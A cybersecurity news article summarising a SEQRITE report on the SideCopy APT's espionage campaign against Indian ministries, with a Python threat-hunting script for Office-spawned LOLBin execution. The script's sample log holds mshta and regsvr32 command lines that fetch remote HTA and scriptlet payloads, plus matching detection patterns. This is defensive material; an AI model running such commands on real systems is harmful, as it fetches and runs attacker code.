Pakistan-Linked SideCopy APT Strikes Indian Government Agencies


The SideCopy advanced persistent threat (APT) group is targeting Indian government ministries and critical infrastructure operators in a new espionage campaign. According to a recent report from cybersecurity company SEQRITE, the group is using emails that impersonate government bodies, together with booby-trapped attachments, to install malware on victims’ computers without their knowledge. The goal is to steal sensitive documents and maintain covert access to important systems.

This new wave of attacks shows how focused and capable state-aligned threat actors have become when targeting government and military sectors. SideCopy has been active for years and is assessed to operate in the interests of Pakistan. It takes its name from its habit of copying the infection chains of other groups (notably SideWinder), which muddies attribution and hides its real identity.


What Is SideCopy APT?

SideCopy is an advanced persistent threat (APT) group. That means it plans long-term intrusions designed to get inside a network and stay hidden there, especially networks belonging to government or military targets. The group has been active since at least 2019 and is believed to be connected to Transparent Tribe (also known as APT36), another group with links to Pakistan.

What makes SideCopy dangerous is its combination of social engineering, custom malware, and purpose-built tooling, which lets it infect victims without raising suspicion.


How the Attack Works

The current campaign begins with phishing emails or compromised websites that appear to offer official documents. The lures include:

  • PDF files that look like government notices

  • ZIP files containing Word documents or executables

  • Microsoft Word documents carrying malicious macros

Once a user opens one of these files (and, for macro documents, enables the content the lure asks for), the malware is installed silently. From there, the attackers can steal data, control the system remotely, or stage additional tools.

SEQRITE researchers identified several malware types in this campaign:

  1. ReverseRAT – This gives the operators full control of the infected machine. It can capture screenshots, manage files, and execute commands remotely.

  2. AllaKore RAT – A lightweight remote access trojan used for surveillance. It logs keystrokes, records activity, and transfers stolen files.

  3. CStealer – A credential stealer that grabs saved browser passwords and uploads them to the attackers’ server.

  4. Keylogger Payloads – These tools silently record everything typed on the keyboard, including passwords, personal messages, and confidential details.


Tactics, Techniques, and Procedures (TTPs)

SideCopy relies on a consistent set of techniques to trick victims and evade defenders:

  • Masquerading: Files are named to look like they come from Indian government bodies such as “Rashtriya Suraksha Mantralaya” or “PMO India,” making them seem trustworthy.

  • Living-off-the-land techniques: The group uses legitimate, signed Windows binaries such as mshta.exe, rundll32.exe, and regsvr32.exe to execute its code. Because these are trusted system components, signature-based antivirus rarely flags them, so detection depends on noticing the context in which they run (for example, a Word or Excel process launching them).

  • Anti-analysis methods: The malware checks whether it is running inside a virtual machine, the environment security researchers typically use for analysis. If it detects one, it alters its behaviour or exits, so a sandbox detonation may show nothing malicious.

  • Encrypted communication: Once installed, the malware connects to command-and-control (C2) servers over encrypted channels. These servers are hosted on compromised websites, mostly located in the South Asia region.
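The living-off-the-land behaviour above is easiest to catch in process-creation telemetry: a Word or Excel process should almost never launch mshta.exe, rundll32.exe or regsvr32.exe. The script below is an added example written for this article, not code from SEQRITE or from the campaign itself. It reads constructed process-creation events (JSON lines with Sysmon-style field names, an assumption about the export format), flags any of the three binaries when spawned by an Office application, and adds generic command-line heuristics (a remote URL, the regsvr32 scriptlet pattern, rundll32 with javascript:) that are chosen for illustration rather than taken from the report.

```python
"""Hunt for Office-spawned LOLBin execution in process-creation logs.

Added example, not SEQRITE's or SideCopy's code. SAMPLE_LOG is constructed
to resemble Sysmon Event ID 1 records exported as JSON lines; the field
names (image, parent_image, command_line) are an assumption about the
export, not a vendor schema.
"""
import json
import re
from typing import Iterable

# Windows binaries the article names as abused for living-off-the-land execution.
LOLBINS = {"mshta.exe", "rundll32.exe", "regsvr32.exe"}

# Office document handlers; a document should rarely spawn a script host.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}

# Command-line patterns that make a LOLBin launch more suspicious. Generic
# heuristics chosen for this example, not indicators from the SEQRITE report.
SUSPICIOUS_ARGS = {
    "remote_url": re.compile(r"https?://", re.I),
    "regsvr32_scriptlet": re.compile(r"/i:\S+.*scrobj\.dll", re.I),
    "rundll32_javascript": re.compile(r"javascript:", re.I),
}

# Constructed sample telemetry: one benign Word launch, one Word -> mshta
# launch with a remote HTA, one benign rundll32, one Excel -> regsvr32
# scriptlet launch, and one non-process event that must be ignored.
# 203.0.113.0/24 is a documentation range, not a real C2 address.
SAMPLE_LOG = r"""
{"event_id":1,"image":"C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE","parent_image":"C:\\Windows\\explorer.exe","command_line":"WINWORD.EXE /n notice.docx"}
{"event_id":1,"image":"C:\\Windows\\System32\\mshta.exe","parent_image":"C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE","command_line":"mshta.exe http://203.0.113.10/update.hta"}
{"event_id":1,"image":"C:\\Windows\\System32\\rundll32.exe","parent_image":"C:\\Windows\\System32\\svchost.exe","command_line":"rundll32.exe shell32.dll,Control_RunDLL"}
{"event_id":1,"image":"C:\\Windows\\System32\\regsvr32.exe","parent_image":"C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE","command_line":"regsvr32.exe /s /n /u /i:http://203.0.113.10/a.sct scrobj.dll"}
{"event_id":3,"image":"C:\\Windows\\System32\\svchost.exe","parent_image":"C:\\Windows\\System32\\services.exe","command_line":"svchost.exe -k netsvcs"}
"""


def basename(path: str) -> str:
    """Lower-cased file name from a Windows path (tolerates forward slashes)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: dict) -> list:
    """Return the reasons a process-creation event looks like LOLBin abuse.

    An empty list means the event is considered benign by these rules.
    """
    if event.get("event_id") != 1:  # only process-creation records apply
        return []
    child = basename(event.get("image", ""))
    parent = basename(event.get("parent_image", ""))
    cmd = event.get("command_line", "")
    reasons = []
    if child in LOLBINS and parent in OFFICE_PARENTS:
        reasons.append(f"{parent} spawned {child}")
    if child in LOLBINS:
        for name, pattern in SUSPICIOUS_ARGS.items():
            if pattern.search(cmd):
                reasons.append(name)
    return reasons


def hunt(lines: Iterable[str]) -> list:
    """Parse JSON lines and collect every event that classify() flags."""
    hits = []
    for raw in lines:
        raw = raw.strip()
        if not raw:
            continue
        try:
            event = json.loads(raw)
        except json.JSONDecodeError:
            continue  # skip malformed lines rather than abort the whole hunt
        reasons = classify(event)
        if reasons:
            hits.append({
                "image": basename(event.get("image", "")),
                "parent": basename(event.get("parent_image", "")),
                "command_line": event.get("command_line", ""),
                "reasons": reasons,
            })
    return hits


if __name__ == "__main__":
    for hit in hunt(SAMPLE_LOG.splitlines()):
        print(f"{hit['parent']} -> {hit['image']}: {hit['command_line']}")
        print("   reasons:", ", ".join(hit["reasons"]))
```

Running it flags the two Office-spawned launches and leaves the benign rundll32 call alone. In production the same logic would run over a SIEM or EDR feed; the parent-child rule is the one that matters most, since a URL or scriptlet in the command line is only confirmation of what the process tree already shows.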

Targets and Objectives

According to SEQRITE, the attackers are focusing on:

  • Indian government employees

  • Defense-related organizations

  • Critical infrastructure providers

  • Entities handling internal communication or sensitive documents

The main aim appears to be cyber-espionage: gathering intelligence, monitoring activity, and possibly laying the groundwork for more disruptive operations in the future.


Defense Recommendations

To protect against such threats, SEQRITE advises organizations and individuals to:

  • Treat unexpected attachments with suspicion even when the sender looks official, since this campaign’s lures impersonate Indian government bodies

  • Disable macros in Microsoft Office unless absolutely necessary, and block macros in documents downloaded from the internet by policy

  • Keep all software and antivirus programs updated

  • Monitor system logs for suspicious activity, in particular Office applications launching mshta.exe, rundll32.exe or regsvr32.exe

  • Conduct regular cybersecurity training for employees

Government bodies and sensitive organizations must also invest in advanced endpoint protection, real-time monitoring, and threat hunting to stay ahead of such targeted APT campaigns.


Conclusion

The latest attacks by SideCopy APT against Indian ministries and infrastructure providers highlight the growing cyber threat from state-sponsored groups. Using impersonation lures, custom malware, and living-off-the-land techniques, these operators aim to steal sensitive data and compromise national security.

It is essential for government organizations, defense agencies, and infrastructure operators to stay alert, adopt strong cybersecurity practices, and share threat intelligence across agencies. Vigilance and preparedness are the best defenses in today’s digital battlefield.
